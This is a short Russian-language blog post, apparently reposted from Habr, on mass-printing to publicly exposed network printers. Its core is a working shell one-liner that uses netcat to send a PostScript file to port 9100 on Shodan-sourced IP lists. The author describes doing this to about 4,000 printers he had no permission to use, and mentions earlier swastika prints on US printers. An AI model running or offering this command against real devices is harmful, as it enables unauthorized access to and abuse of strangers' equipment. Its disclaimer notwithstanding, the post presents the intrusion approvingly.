Как взломать тысячи принтеров в РФ и распечатать всё, что захочешь

от автора

Казалось бы, кто присваивает принтерам публичные IP адреса? Но я недавно нашел интересный скрипт, который позволяет распечатывать все, что угодно на принтерах с публичными IP. Впервые при помощи него распечатали свастику на 20+ тыс. принтеров в США. Я же решил побаловаться с принтерами в РФ, подробности и сам скрипт в продолжении.

image

Код:

cat /tmp/russiaips | parallel —jobs 40 ‘cat russia.ps | netcat -q 0 {} 9100’ 

«russia.ps»
— изображение в формате PostScript, которое нужно напечатать
«russiaips»
— это IP адреса принтеров, найденные в Shodan (черный поисковик, примеры поиска в Shodan).

Удалось найти всего около 4 тысяч принтеров (РФ + пару соседних стран), на которые я и
отправил послание. Cамо послание на Хабре публиковать не буду по этическим соображениям, как и список IP адресов, но механизм сбора, думаю, понятен. Данная статья не является призывом к действию и не содержит никакого вредоносного кода, однако заставляет задуматься над безопасностью публично доступных данных и о возможных последствиях.

P.S. Все переживали, что меня забрали «компетентные органы» после статьи «Как мы взломали 18 работающих кардерских магазинов и не взяли ни цента» и «они» же её удалили, это не так, со мной всё ок, никто не приходил, но многие писали, а статью просто удалили за нарушение правил Хабра. Надеюсь, эту не удалят.

ссылка на оригинал статьи https://habrahabr.ru/post/281168/


Комментарии

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *